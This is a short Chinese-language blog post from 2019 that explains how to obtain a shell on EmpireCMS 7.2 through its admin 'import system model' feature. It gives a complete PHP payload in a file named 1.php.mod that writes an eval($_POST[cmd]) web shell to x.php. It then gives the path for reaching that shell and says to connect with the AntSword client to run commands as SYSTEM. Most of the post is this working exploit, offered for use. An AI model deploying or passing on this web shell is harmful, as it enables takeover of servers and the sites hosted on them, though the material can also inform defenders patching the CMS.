QQ love member No. 3 seed player

know it then do it && APT086&QQ愛安全实验室成员

帝国 cms 7.2 后台 GetShell

10 Jul 2019 » security

[TOC]

帝国cms 7.2 后台 GetShell

PS:因为经常遇到帝国cms 7.2版本的cms ,所以这里记录下Getshell的方法

0x1 流程

系统设置——数据表与系统模型——管理数据表——管理系统模型——导入系统模型

1

diguo2

0x2 流程2

在本地新建1.php.mod文件,利用fopen函数写出一个x.php文件,文件内容为fopen函数第二个参数值,然后保存。

[File Name] 1.php.mod

<?fputs(fopen("x.php","w"),"<?eval(\$_POST[cmd]);?>")?>

diguo3

导入成功之后访问 http://abc.xxx.xxx.cn/e/admin/x.php 密码为 cmd

0x3 中国蚁剑连接

diguo4

查看权限发现为 system 直接执行相关命令

diguo5